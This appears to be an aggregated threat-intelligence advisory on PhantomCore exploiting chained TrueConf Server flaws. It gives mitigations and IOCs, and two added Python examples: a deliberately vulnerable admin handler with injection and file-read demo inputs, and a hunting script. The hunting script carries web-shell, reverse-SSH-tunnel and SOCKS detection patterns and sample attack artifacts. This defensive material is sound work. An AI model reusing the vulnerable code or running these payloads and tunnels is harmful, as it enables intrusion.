
PhantomCore Exploits TrueConf Vulnerabilities to Breach Russian Networks

Published:

27 April 2026 at 11:54:00

Alert date:

27 April 2026 at 13:02:18

Source:

thehackernews.com


Enterprise Applications, Ransomware & Malware, Zero-Day Vulnerabilities

PhantomCore, a pro-Ukrainian hacktivist group, has been targeting servers running TrueConf video conferencing software in Russia since September 2025. According to Positive Technologies researchers, who attributed the attacks to the group, the operators chain three TrueConf Server vulnerabilities to execute commands remotely on exposed systems, turning a piece of collaboration infrastructure into an entry point into the victim network.

Technical details

PhantomCore exploited a chain of three TrueConf Server vulnerabilities: insufficient access control that lets unauthenticated requests reach administrative endpoints, an arbitrary file read, and a command injection that executes arbitrary OS commands. Chained together, the three give an unauthenticated attacker remote command execution on the server. The intrusion begins with the compromised TrueConf server, which is then used as a springboard for lateral movement into the rest of the network. Tools deployed include PHP web shells for remote command execution; the PhantomPxPigeon backdoor, disguised as a legitimate TrueConf client; the tunneling utilities PhantomSscp, MacTunnelRat and PhantomProxyLite; ADRecon for Active Directory reconnaissance; DumpIt, MemProcFS and a modified Veeam-Get-Creds for credential harvesting (memory acquisition and analysis, and extraction of credentials stored by Veeam Backup & Replication); and the SOCKS proxies microsocks, rsocx and tsocks. The group creates a rogue administrative account named 'TrueConf2' and maintains persistence through reverse SSH tunnels.
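The three defect classes in that chain are generic enough to show in code. The following is an added illustration, not TrueConf's code and not a reproduction of the real endpoints: a hypothetical admin handler that has all three defects next to a hardened one that closes each. The route names, request parameters, session store, log directory and ping allow-list are assumptions made for the example; the handlers return the action they would take instead of performing it, so the block runs offline.

```python
"""Hypothetical admin handler (assumption, not TrueConf's code) showing the three
vulnerability classes named in the advisory, and a hardened counterpart:
  1. no authz check in front of /admin/* routes,
  2. client-controlled path passed to a file read,
  3. client data concatenated into a shell command string.
Handlers return ("read", path) / ("exec_*", cmd) rather than acting, so the
example is safe to run."""

import posixpath
import re

# Constructed sample state (assumptions for the example).
ADMIN_SESSIONS = {"tok-admin-1"}                 # valid admin session tokens
LOG_DIR = "/var/log/app"                         # only files below here may be read
PING = "/bin/ping"                               # allow-listed diagnostic binary
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")  # conservative hostname/IPv4 shape


class Request:
    def __init__(self, path, params, session=None):
        self.path, self.params, self.session = path, params, session


# ---------------- vulnerable: all three classes in one handler --------------
def vulnerable_dispatch(req):
    """No session gate, raw path for reads, shell string for command execution."""
    if req.path == "/admin/readfile":
        # arbitrary file read: the client controls the whole path
        return {"status": 200, "action": ("read", req.params["name"])}
    if req.path == "/admin/diag":
        # command injection: user data concatenated into a shell=True string
        return {"status": 200,
                "action": ("exec_shell", "ping -c 1 " + req.params["host"])}
    return {"status": 404, "action": None}


# ---------------- hardened: authz first, then strict input handling ---------
def safe_log_path(name):
    """Confine `name` to LOG_DIR; reject NUL bytes, absolute paths and traversal."""
    if "\x00" in name or name.startswith("/"):
        raise ValueError("bad file name")
    full = posixpath.normpath(posixpath.join(LOG_DIR, name))
    if posixpath.commonpath([LOG_DIR, full]) != LOG_DIR:
        raise ValueError("path escapes log directory")
    return full


def safe_ping_argv(host):
    """Validate the host, then pass it as a separate argv element (no shell),
    so shell metacharacters and leading dashes are inert."""
    if not HOST_RE.fullmatch(host) or host.startswith("-"):
        raise ValueError("bad host")
    return [PING, "-c", "1", host]


def hardened_dispatch(req):
    if req.path.startswith("/admin/") and req.session not in ADMIN_SESSIONS:
        return {"status": 401, "action": None}       # gate every admin route
    try:
        if req.path == "/admin/readfile":
            return {"status": 200,
                    "action": ("read", safe_log_path(req.params["name"]))}
        if req.path == "/admin/diag":
            return {"status": 200,
                    "action": ("exec_argv", safe_ping_argv(req.params["host"]))}
    except ValueError:
        return {"status": 400, "action": None}
    return {"status": 404, "action": None}


if __name__ == "__main__":
    # Unauthenticated file read and command injection against the weak handler ...
    print(vulnerable_dispatch(Request("/admin/readfile", {"name": "/etc/passwd"})))
    print(vulnerable_dispatch(Request("/admin/diag", {"host": "127.0.0.1; id"})))
    # ... versus 401 (no session) and 400 (rejected host) from the hardened one.
    print(hardened_dispatch(Request("/admin/diag", {"host": "127.0.0.1; id"})))
    print(hardened_dispatch(Request("/admin/diag", {"host": "127.0.0.1; id"},
                                    session="tok-admin-1")))
```

The order of the checks matters: the session gate runs before any parameter is looked at, so an unauthenticated client never reaches the file or command code paths, and the remaining two defects are closed independently (path confinement under a fixed directory, and argv execution with a validated value) rather than by a single filter.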

Mitigation steps:

Apply the security patches TrueConf released on August 27, 2025 for the three vulnerabilities (BDU:2025-10114, BDU:2025-10115, BDU:2025-10116). Patching closes the initial access vector only; servers that were reachable before the patch should also be checked for the artifacts below, since accounts, web shells and tunnels planted earlier survive an update.
Audit TrueConf Server administrative accounts and remove any you did not create, in particular one named 'TrueConf2'.
Monitor network traffic for unusual TrueConf server communications, outbound SSH from the server (reverse tunnels), SOCKS proxy listeners, and lateral-movement patterns originating from the server.
Inspect the TrueConf web root for PHP web shells.
Watch for reconnaissance with ADRecon and for credential harvesting, including memory dumping (DumpIt, MemProcFS) and access to Veeam Backup & Replication stored credentials.
Deploy endpoint detection for the malware families named above and keep threat intelligence on PhantomCore TTPs current.
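The host-side checks above (rogue account, PHP web shell, reverse SSH tunnel, SOCKS proxy) can be scripted. The following is an added hunting example, not code from the advisory, TrueConf or Positive Technologies: it runs the checks over a snapshot of a host. The snapshot format, the web-root location, the web-shell heuristic (request input reaching a code or command sink) and the ssh option matching are assumptions, and the sample data is constructed, not captured.

```python
"""Added hunting example: look for the PhantomCore post-exploitation artifacts
named in the advisory in a constructed host snapshot.  Heuristics and data
formats are assumptions for this example, not TrueConf or vendor code."""

import re
from dataclasses import dataclass

ROGUE_ACCOUNTS = {"trueconf2"}                        # named in the advisory
SOCKS_TOOLS = {"microsocks", "rsocx", "tsocks"}       # named in the advisory

# Web-shell heuristic (assumption): PHP where request input can reach a
# code/command sink.  Either half alone is common in legitimate code.
PHP_SOURCE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
PHP_SINK = re.compile(
    r"\b(?:eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\(")
# ssh short-option cluster carrying R (remote forward): "-R", "-fNR", "-R2222:..."
SSH_REMOTE_FWD = re.compile(r"^-[A-Za-z]*R")


@dataclass
class Process:
    pid: int
    exe: str
    cmdline: str


@dataclass
class HostSnapshot:
    accounts: list        # local / TrueConf administrative account names
    web_files: dict       # path -> contents for files under the web root
    processes: list       # running processes


def _basename(exe):
    name = exe.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def rogue_accounts(snap):
    return [a for a in snap.accounts if a.lower() in ROGUE_ACCOUNTS]


def php_webshells(snap):
    return [path for path, body in snap.web_files.items()
            if path.lower().endswith((".php", ".phtml"))
            and PHP_SOURCE.search(body) and PHP_SINK.search(body)]


def reverse_ssh_tunnels(snap):
    """ssh -R opens a listener on the remote host that is forwarded back into
    this one: the shape of the reverse tunnels used for persistence."""
    return [p for p in snap.processes
            if _basename(p.exe) == "ssh"
            and any(SSH_REMOTE_FWD.match(arg) for arg in p.cmdline.split())]


def socks_proxies(snap):
    return [p for p in snap.processes if _basename(p.exe) in SOCKS_TOOLS]


def hunt(snap):
    """Return (category, detail) findings for every artifact class checked."""
    findings = [("rogue_account", a) for a in rogue_accounts(snap)]
    findings += [("php_webshell", p) for p in php_webshells(snap)]
    findings += [("reverse_ssh_tunnel", f"pid {p.pid}: {p.cmdline}")
                 for p in reverse_ssh_tunnels(snap)]
    findings += [("socks_proxy", f"pid {p.pid}: {p.cmdline}")
                 for p in socks_proxies(snap)]
    return findings


# Constructed sample snapshot (addresses from documentation ranges, web root
# path assumed); one hit per category plus benign decoys.
SAMPLE = HostSnapshot(
    accounts=["Administrator", "svc_trueconf", "TrueConf2"],
    web_files={
        "/opt/trueconf/www/index.php": "<?php echo 'ok'; ?>",
        "/opt/trueconf/www/lib/view.php":
            "<?php $q = $_GET['q']; echo htmlspecialchars($q); ?>",
        "/opt/trueconf/www/img/cache.php": "<?php @eval($_POST['x']); ?>",
    },
    processes=[
        Process(900, "/usr/bin/ssh", "ssh backup@192.0.2.5"),
        Process(1201, "/usr/bin/ssh", "ssh -fN -R 2222:127.0.0.1:22 u@203.0.113.10"),
        Process(1340, "/tmp/.x/microsocks", "microsocks -p 1080"),
    ],
)

if __name__ == "__main__":
    for category, detail in hunt(SAMPLE):
        print(f"{category:20s} {detail}")
```

In production the snapshot would be filled from the real sources (the TrueConf Server admin user list, a recursive read of the web root, and the process table); the web-shell heuristic is deliberately a source-plus-sink match so that an input-only file such as the `view.php` decoy is not flagged, while a one-line `eval($_POST[...])` dropper is.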

Affected products:

TrueConf Server
TrueConf video conferencing software
Veeam Backup & Replication software

Related links:

https://ptsecurity.com/research/pt-esc-threat-intelligence/hiding-in-plain-sight-how-phantomcore-masks-its-activity-with-legitimate-tools/
https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/
https://thehackernews.com/2025/03/kaspersky-links-head-mare-to-twelve.html
https://thehackernews.com/2025/12/phantom-stealer-spread-by-iso-phishing.html
https://t.me/Positive_Technologies/3779
https://ptsecurity.com/research/trending-vulnerabilities/BDU-2025-10114/
https://ptsecurity.com/research/trending-vulnerabilities/BDU-2025-10115/
https://ptsecurity.com/research/trending-vulnerabilities/BDU-2025-10116/
https://habr.com/ru/companies/pt/articles/947166/
https://securelist.ru/head-mare-campaign-phantompxpigeon-backdoor-and-trueconf-software/114998/
https://github.com/sadshade/veeam-creds/blob/main/Veeam-Get-Creds.ps1
https://rt-solar.ru/solar-4rays/blog/4559/
https://github.com/rofl0r/microsocks
https://github.com/b23r0/rsocx/
https://github.com/jun7th/tsocks/blob/master/tsocks.py
https://habr.com/ru/companies/F6/articles/966072/
https://thehackernews.com/2025/08/clickfix-malware-campaign-exploits.html
https://thehackernews.com/2025/07/asyncrats-open-source-code-sparks-surge.html
https://thehackernews.com/2025/07/hackers-use-leaked-shellter-tool.html
https://ptsecurity.com/research/pt-esc-threat-intelligence/an-alarm-you-can-t-ignore-how-capfix-attacks-russian-organizations/
https://securelist.ru/tr/geo-likho-hits-russian-aviation/115306/
https://ptsecurity.com/research/pt-esc-threat-intelligence/mythic-likho-cyberattacks-on-russian-critical-information-infrastructure/
https://securelist.ru/merlin-loki-mythic-attacks/111704/
https://github.com/MythicAgents/merlin
https://securelist.ru/loki-agent-for-mythic/110361/
https://thehackernews.com/2023/02/threat-actors-adopt-havoc-framework-for.html
https://thehackernews.com/2026/02/bloody-wolf-targets-uzbekistan-russia.html
https://thehackernews.com/2026/01/multi-stage-phishing-campaign-targets.html
https://habr.com/ru/companies/pt/articles/1001196/
https://bi.zone/eng/expertise/blog/triedinoe-zlo-oborotni-atakuyut-sotrudnikov-silovykh-struktur/

Related CVEs:

None listed; the three TrueConf vulnerabilities are tracked under BDU identifiers (see Mitigation steps).

Related threat actors:

PhantomCore

IOCs:

TrueConf2 (rogue user account), PhantomPxPigeon backdoor, PhantomSscp DLL, MacTunnelRat PowerShell script, PhantomProxyLite PowerShell script, CapDoor backdoor, EchoGather trojan, SoullessRAT, AquilaRAT, stardebug[.]app (fake website), alphafly-drones[.]com (fake website)

This article was created with the assistance of AI technology by Perceptive.

© 2025 by Perceptive Security. All rights reserved.

email: info@perceptivesecurity.com

Disclaimer: This website displays information originating from external sources. Perceptive accepts no responsibility for the content, accuracy or completeness of this information.
